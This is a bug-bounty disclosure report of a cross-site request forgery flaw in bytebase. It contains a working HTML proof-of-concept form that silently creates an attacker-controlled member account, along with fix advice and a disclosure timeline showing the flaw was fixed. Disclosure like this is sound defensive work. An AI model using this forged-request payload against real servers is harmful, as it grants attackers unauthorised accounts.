Cross-Site Request Forgery (CSRF) in bytebase/bytebase


Reported on

Oct 13th 2021


all part of application That use POST http method to change or create data are vulnerable to CSRF attacks.( for example the PATCH methods are not vulnerable)

I will show just create a member POC for you and if you want to see other POCs of other endpoint just say me to provide them too( I thought don't need to more POC)

1.Open the PoC.html file

2.After that you open the PoC.html a request will be sent to http://YOURSERVER:5678/api/principal endpoint.

  1. after that you can see that attacker create a Dev member named attacker with email that already have the credentials of new user.
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOURSERVER:5678/api/principal" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;data&quot;&#58;&#123;&quot;type&quot;&#58;&quot;PrincipalCreate&quot;&#44;&quot;attributes&quot;&#58;&#123;&quot;name&quot;&#58;&quot;attacker&quot;&#44;&quot;email&quot;&#58;&quot;attacker&#64;mail&#46;com&quot;&#44;&quot;password&quot;&#58;&quot;VGS86VrDTMAOUYP0&quot;&#125;&#125;&#44;&#13;&#10;&quot;test&quot;&#58;&quot;" value="&quot;&#125;" />
      <input type="submit" value="Submit request" />

The impact of this CSRF is high.

#Fix suggestion

set SameSite flag for all cookies to Strict Or Lax

Or the better way is that create a CSRF token for each request.

We have contacted a member of the bytebase team and are waiting to hear back 2 years ago
bytebase/bytebase maintainer validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
bytebase/bytebase maintainer marked this as fixed with commit fd1d92 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
2 years ago


hey bytebase team, can i ask you to tell me why delete the other occurrences?

2 years ago


there are many CSRFs exist in bytebase and I found all of them, if you make a one fix for all that doesn't mean there is only one occurrence(according to other bug bounty programs that i see) please let me know and if you agree i report them again.

2 years ago


Hey ByteBase team

Any feedback?

to join this conversation